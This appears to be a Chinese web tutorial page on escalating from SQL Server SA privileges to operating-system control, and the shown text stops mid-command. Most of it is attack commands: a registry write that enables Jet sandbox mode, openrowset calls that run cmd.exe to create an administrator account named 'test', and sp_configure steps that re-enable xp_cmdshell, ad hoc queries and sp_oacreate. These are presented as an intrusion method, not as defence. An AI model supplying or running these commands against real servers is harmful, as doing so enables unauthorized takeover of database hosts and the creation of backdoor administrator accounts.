解讀SQL Server SA權限最新入侵方法_Mssql數據庫教程

      編輯Tag賺U幣
      教程Tag:暫無Tag,歡迎添加,賺取U幣!

      推薦:通過事務日志解決SQL Server常見四大故障(一)
      當系統出現故障時,只要存在數據日志那么就可以利用它來恢復數據解決數據庫故障。作為SQL Server數據庫管理員,了解數據日志文件的作用,以及如何利用它來解決一些數據庫的常見故障,這非常重要。既然事務日志這么重要,那么他到底可以用來做什么事情呢?口說

      使用jet沙盤模式,可以解決XP_cmdshell等存儲過程和相關動態鏈接庫帶來的煩惱。出于安全原因,系統默認情況下沙盤模式未開啟,這就需要xp_regwrite開啟沙盤模式:

      Exec master.dbo.xp_regwrite ''HKEY_LOCAL_MACHINE'',''SOFTWARE\Microsoft\Jet\4.0

       

        \Engines'',''SandBoxMode'',''REG_DWORD'',1

        然后執行沙盤命令,在系統添加一個用戶名為test,密碼為1234的用戶:

      select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:\windows

       

        \system32\ias\ias.mdb'',''select shell("cmd.exe /c net user test 1234 /add")'')

        select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:\windows

        \system32\ias\ias.mdb'',''select shell("cmd.exe /c net localgroup

        administrators test /add")'')

        不同的,路徑也不一樣,需要根據情況做修改:操作系統

        NT/2K: c:\winnt\system32\

        XP/2003: c:\windows\system32\

        另外Microsoft SQL Server2005在默認情況下,一些存儲過程是關閉著的,需要命令打開:

        開啟XP_cmdshell:

      EXEC sp_configure ''show advanced options'', 1;RECONFIGURE;EXEC sp_configure

       

        ''xp_cmdshell'', 1;RECONFIGURE;

        開啟''OPENROWSET'': 

      exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp_configure

       

        ''Ad Hoc Distributed Queries'',1;RECONFIGURE;

        開啟''sp_oacreate'':  

      exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp

      分享:通過事務日志解決SQL Server常見四大故障(二)
      數據庫鏡像方案有兩種鏡像運行模式。一種是

      來源:模板無憂//所屬分類:Mssql數據庫教程/更新時間:2009-08-25
      相關Mssql數據庫教程